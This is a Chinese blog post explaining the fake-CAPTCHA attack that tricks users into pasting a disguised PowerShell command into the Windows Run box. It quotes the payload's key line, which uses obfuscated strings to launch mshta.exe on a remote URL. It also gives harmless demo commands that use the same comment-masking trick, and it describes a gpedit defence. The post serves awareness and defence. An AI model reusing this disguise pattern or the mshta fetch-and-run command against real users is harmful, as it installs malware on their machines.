昨天晚上刷微博的时候,看到教主发的《现在黑产有一种新的社交工程学挂马方案》 ,虽然技术不高深,但是迷惑性还是蛮大的。也是因为看不懂教主发的微博,让我时常自惭形秽。
看描述,应该是在访问一些网站的时候会弹出人机验证的界面,根据截图看来应该是国外的网站,国内网站未为可知,或者也有。当然,这种网站基本都不可能是什么正规网站,即使现在中文网站没用这些技术,可能过几天也就出了中文版本了。
基于这种验证,在弹出这个窗口的时候页面已经将要粘贴到文本内容写入了粘贴板,此时你按照页面提示,按下键盘的 Win +R 键,此时会弹出运行窗口,然后,你再按 Ctrl +v 粘贴验证文本,此时运行窗口就变成了下面的样子:
真的不同的 windows 版本(系统设置)可能前面的选择框样式有所区别,但是看起来似乎没什么问题对不对?
此时你要执行第三步了,按键盘的 Enter 或者点击确定。点了之后,一个黑窗口出来又消失了,似乎没什么变化,然而,就在这时候,你已经下载了黑客的木马文件并且执行了,而这个操作,火绒似乎也不会有什么反应。
那么问题出在什么地方呢?当然是你复制到运行窗口内的那段文字,实际上全部内容应该是类似下面的样子:
然而,这段经过精心设计的问题,在粘贴到运行窗口之后。由于运行窗口默认显示机制是显示最后的文本,那么刚好就显示了想让你看到的那一段:
✅ 'I am not a robot: CAPTCHA Verification UID: 1314
让你自以为是在做验证,然而,这一句是注释,真正有用的是前面的这一段:
Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine=('ms' + 'hta' + '.exe '+$l)}
通过 mshta.exe 加文件路径反问文件并且执行。那么知道怎么实现的,我稍微改造了一下,不会产生任何的危害,也可以测试下效果。
例如复制下面这段,运行之后会打开计算器:
powershell -w 1 -C "$l='https://oba.by/';Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine=('cal' + 'c' + '.exe ')}" # ✅ 'I am not a robot: CAPTCHA Verification UID: 1314'
运行效果:
下面这行命令会在运行之后直接打开我的博客:
powershell -w 1 -C "$l='https://oba.by/';Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine=('C:\Program Files\Internet Explorer\iexplor' + 'e' + '.exe https://oba.by')}" # ✅ 'I am not a robot: CAPTCHA Verification UID: 1314'
运行效果:
要解决这个问题,最简单的是不要在脱离当前程序运行任何命令,当然,也可以按照教主的做法,直接禁用运行:
Win+R,输入 gpedit.msc 运行。然后打开[用户配置] -> [管理模板] -> [“开始”菜单和任务栏],找到[从“开始”菜单中删除“运行”菜单],双击打开,选择“已启用”。
设置之后再次按 win +R 就会出现下面的提示:
如果要恢复功能,在开始菜单直接搜索gpedit.msc,点击运行之后将选项改为未配置或者已禁用即可。
简而言之,上网要小心,眼见不一定为真,不然,哪里有那么多的美女呢!祝大家情人节快乐啊!
